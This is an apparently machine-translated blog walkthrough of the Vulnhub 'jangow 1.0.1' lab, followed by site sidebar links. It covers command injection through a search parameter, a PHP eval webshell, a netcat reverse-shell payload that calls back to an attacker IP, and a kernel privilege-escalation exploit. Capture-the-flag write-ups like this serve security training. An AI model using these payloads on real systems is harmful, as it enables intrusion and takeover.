当前位置:网站首页>[vulnhub range] janchow: 1.0.1
[vulnhub range] janchow: 1.0.1
2022-06-10 19:00:00 【Nailaoyyds】
Catalog
Remember a kali The double card IP Don't show problems
One 、 information gathering
Jangow1.0.1 Drone aircraft IP:192.168.56.118
kali attack IP: 192.168.56.102The start is for IP Of

nmap scanning


Get the open port and service of the target host Two 、web penetration

Look for function points
go in site file , Discover function points
http://192.168.56.118/site/busque.php?buscar=
Try command execution whoami
http://192.168.56.118/site/busque.php?buscar=whoami
It is found that the command can be executed
Check the password file
cat/etc/passwd

But you can only view files , Can't log in . The next step is needed
Write a word Trojan
Write a word Trojan
echo '<?php @eval ($_POST["123"]);?>' >>shell.php
Ant sword connection

3、 ... and 、 exploit victory
Search for sensitive files


Four 、 Elevated privileges
Some files do not have permission to view , Do permission promotion
Bounce shell
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>Bounce shell
Rebound success

upgrade shell, Become interactive
python3 -c 'import pty;pty.spawn("/bin/bash")'
uname -a
Get version number 
Raise the right
According to the system version
searchsploit ubuntu 4.4.0
use 45010.c This document carries out the right raising
The ant sword uploads the file to the target plane
Download link
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip 
Ant sword upload 
gcc 45010.c -o exp // Generate executable files
chmod +x exp // Add executable rights
./exp // perform exp file

Get into root Catalog
Find files


5、 ... and 、 Get flag


边栏推荐
- Some summary about YUV format
- 数字化时代,企业为什么要做数字化转型?
- Use of uiautomator2 automated test tool
- Chapter II data type (I)
- Adobe Premiere Basics - introduction, configuration, shortcut keys, creating projects, creating sequences (I)
- Pits encountered during the use of ETL (ETL Chinese garbled)
- Adobe Premiere Foundation (animation) (VII)
- Request header field xxxx is not allowed by Access-Control-Allow-Headers in preflight response问题
- 端午“沉浸式云旅游”怎么玩?即构助力“直播+”新场景落地
- 【接口教程】EasyCVR如何通过接口设置平台级联?
猜你喜欢

What is Bi? Talk about the definition and function of Bi

数据处理时代,数据分析成为基础建设

Adobe Premiere基础-素材嵌套(制作抖音结尾头像动画)(九)

Stream流的常用方法-Lambder

TestNG的HelloWorld例子以及如何在命令行下运行

Adobe Premiere foundation - Import and export, merge materials, source file compilation, offline (II)

第二章 数据类型(一)

Seata安装Window环境

Introduction to ad18 device library import

瑞芯微RK1126平台 平台移植libevent 交叉编译libevent
随机推荐
"Digital transformation, data first", talk about how important data governance is to enterprises
Wireshark learning notes (I) common function cases and skills
How to correctly understand the real-time nature of Bi?
[QNX hypervisor 2.2 user manual] 3.2.1 VM configuration syntax
Adobe Premiere foundation - material nesting (animation of Tiktok ending avatar) (IX)
Opencv does not rely on any third-party database for face detection
Cross domain error: when allowcredentials is true, allowedorigins cannot contain the special value "*“
商业智能BI的服务对象,企业管理者的管理“欲望”该如何实现?
uniapp uview 框架的form表单,输入校验手机号、校验微信号
第四章 数据类型(三)
Adobe Premiere basic special effects (card point and transition) (IV)
直播预告 | 社交新纪元,共探元宇宙社交新体验
Adobe Premiere基础(轨道相关)(五)
端午“沉浸式云旅游”怎么玩?即构助力“直播+”新场景落地
商业智能BI如何帮企业降低人力、时间和管理成本?
Chapter 161 SQL function year
Data URL
Form form of the uniapp uview framework, input the verification mobile number and verification micro signal
Linked List
Adobe Premiere基础特效(卡点和转场)(四)